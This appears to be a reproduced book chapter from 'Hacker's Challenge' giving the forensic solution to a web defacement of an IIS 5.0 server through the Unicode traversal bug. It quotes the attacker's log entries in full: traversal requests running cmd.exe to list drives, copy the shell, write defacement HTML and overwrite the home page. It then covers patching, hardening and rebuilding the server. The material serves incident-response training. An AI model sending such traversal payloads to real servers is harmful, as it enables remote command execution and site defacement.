case study1 web defacement answer.pdf
0 likes936 views
The attacker exploited a known vulnerability in Microsoft IIS Web server version 5.0 to gain access to the victim's web server. They used cmd.exe commands to explore the server and obtain information. The attacker then created a file called cmd1.exe to hide their actions, defaced the website, and installed a web page announcing the hacking before leaving. The incident occurred over 10 minutes and could have been prevented by keeping software updated and restricting user privileges.
case study1 web defacement answer.pdf
- 1. 1 The French Connection by Bill Pennington, Guardent, Inc. 197 Copyright 2002 by The McGraw-Hill Companies, Inc. Click Here for Terms of Use.
- 2. P uzzled from what appeared to be a lack of evidence, the I.T. staff began to re- search Web defacement attacks and soon discovered that the Web server soft- ware they were using, Microsoft’s IIS Web server version 5.0, had a well-known bug that easily allowed attackers to take control of the machine. The bug the attacker exploited, the “Web server file request parsing vulnerability” (better known as the “Unicode Attack”), is detailed in the CVE database under #CVE-2000-0886. This was an unsettling discovery for the I.T. staff; they realized that this server was on the inside of the network when it was compromised. Therefore, the attacker could now have backdoors to any number of systems inside the network, as well as copies of sensitive data and passwords. Once the I.T. staff knew the probable method of entry, the well-known Unicode Web server bug, they began to piece together the attack. The bug relies on the ability to execute a system shell, a program called cmd.exe, in order to execute commands on the Web server. The I.T. staff found that if this bug was used, evidence of the at- tack would be in the Web server log files. They collected all of the log files from the Web server and imported them into a database for analysis. As cmd.exe is not a normally occurring string in Web server log files, they performed a search for that string and found the following: 03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 3 1 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) This was the first probe. If successful, the attacker would get a directory listing of the victim computer’s C drive. This is a common, non-invasive technique em- ployed by automated scanning programs to test whether a computer is vulnerable to this bug, without causing any damage. The next entry was another probe, looking at the directory listing of the D drive, if it existed: 03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d: 200 747 484 3 1 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) The following 13 log file entries show the attacker retrieving various directory listings in order to get a lay of the land, so he could be familiar with the environ- ment. This involved retrieving more directory listings, as well as viewing the vic- tim’s home page. 03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+e: 502 381 484 4 7 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 3 198 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios
- 3. 1 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:asfroot 200 6 66 492 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows +98) 03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:inetpub 200 7 49 492 32 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows +98) 03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c:inetpubwwwroo t 200 1124 499 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0; +Windows+98) 03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /‘mmc.gif - 404 3387 440 0 www.victim.com Mozilla/4.0+(compati ble;+MSIE+5.0;+Windows+98) 03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /mmc.gif - 404 3387 439 0 www.victim.com Mozilla/4.0+(compatib le;+MSIE+5.0;+Windows+98) 03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d: 200 747 484 1 6 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:wwwroot.com 2 00 229 496 32 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Win dows+98) 03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d:wwwroot 200 4 113 492 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Window s+98) 03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /buzzxyz.html - 200 228 444 16 www.victim.com Mozilla/4.0+(com patible;+MSIE+5.0;+Windows+98) 03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 Solution 1: The French Connection 199
- 4. 200 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios GET /xyzBuzz3.swf - 200 245 324 5141 www.victim.com Mozilla/4.0+(c ompatible;+MSIE+5.0;+Windows+98) 03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 228 484 0 www.victim.com Mozilla/4.0+(compat ible;+MSIE+5.0;+Windows+98) http://www.victim.com/buzzxyz.html Once the attacker had a better understanding of the environment, the attack be- gan. First, he renamed an auxiliary Web page to test his capabilities: 03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+rename+d:wwwrootdet our.html+detour.html.old 502 355 522 31 www.victim.com Mozilla/4.0+ (compatible;+MSIE+5.0;+Windows+98) Next, he created a directory, c:ArA, to set up shop; copied cmd.exe to his work area; and renamed it cmd1.exe: 03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+md+c:ArA 502 355 48 8 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) 03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:winntsystem3 2cmd.Exe+c:ArAcmd1.exe 502 382 524 125 www.victim.com Mozilla/4. 0+(compatible;+MSIE+5.0;+Windows+98) The preceding is the last entry for the cmd.exe search. It becomes clear that the attacker was then using cmd1.exe to do his dirty work. A search for cmd1.exe turned up the entries that follow. In the first entry for the cmd1.exe search, the attacker built the Web page he wanted to use to replace the real Web page on the server: 03/03/2001 4:07 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+echo+"<title>SKI</title><center ><H1><b><u>****</u>SCRIPT+KIDZ, INC<u>****</u></h1><br><h2>You,+my+ friendz+,are+completely+owned.+I'm+here,+your+security+is+nowhere.< br>Someone+should+check+your+system+security+coz+you+sure+aren't.<b r></h2>"+>+c:ArAdefault.htm 502 355 763 31 www.victim.com Mozilla /4.0+(compatible;+MSIE+5.0;+Windows+98) The attacker made a backup of the original Web site: 03/03/2001 4:08 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+rename+d:wwwrootindex.html+in dex.html.old 502 355 511 16 www.victim.com Mozilla/4.0+(compatible; +MSIE+5.0;+Windows+98)
- 5. Finally, the attacker copied the defaced Web site over the original Web site and viewed his handiwork: 03/03/2001 4:10 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+copy+c:ArAdefault.htm+d:wwwr ootindex.html 502 382 514 31 www.victim.com Mozilla/4.0+(compatibl e;+MSIE+5.0;+Windows+98) 03/03/2001 4:11 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 276 414 15 www.victim.com Mozilla/4.0+(compa tible;+MSIE+5.0;+Windows+98) As you can see from the log files, the attack from start to finish took just ten minutes. ANSWERS 1. The attacker used the “Web server file request parsing vulnerability,” as detailed in the CVE database under #CVE-2000-0886, to get into the Web server. 2. The attacker made a copy of cmd.exe and renamed it to cmd1.exe, which obfuscated the audit trail, forcing the forensic investigator to follow a new log pattern. PREVENTION Prevention of this attack would have been simple if the software on the Web server was kept up to date. The patch for the vulnerability the attacker used was released five months prior to the penetration. The patch in this case was in the form of a hot-fix, and at the time of this writing had not been rolled into a full-service pack. The administrators had installed all the service packs but had failed to install the ad- ditional hot-fixes. Proper hardening of the Web server could also have prevented this attack. When executing this attack, the attacker is issuing commands as the IUSR_COMPTERNAME account. This account has no special administrative privileges on the Web server other than the privileges given to EVERYONE. The EVERYONE group, by default, has per- mission to execute all of the commands located in the %winnt%/system32 directory. On most servers of this kind, administrators are the only users that need to execute these commands from the console. Removing the rights for the EVERYONE group to execute the commands in the %winnt%/system32 directory would have prevented this attack, and most other attacks in the same class. Solution 1: The French Connection 201
- 6. MITIGATION To mitigate the damage caused by the penetration, the company decided to com- pletely rebuild the Web server from scratch using the latest software available. While not always necessary, a complete rebuild is the best way to regain strong confidence in a machine’s software after a penetration. For continued security and accountability, the maintenance of the machine was assigned to a single person. In order to gain peace of mind, the company also ordered a security audit from an outside firm to assess any possible deeper penetration of their internal infrastruc- ture. No further damage was found. However, a few weeks later, the company would again find themselves in need of security assistance; that story is detailed in Challenge 2, “The Insider.” ADDITIONAL RESOURCES The Honeynet project had a scan of the month of February 2001 that profiled a very similar attack: http://project.honeynet.org/scans/scan12/ Microsoft’s security bulletin for the vulnerability, including patch information: http://www.microsoft.com/technet/security/bulletin/ms00-086.asp The CVE entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0886 202 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios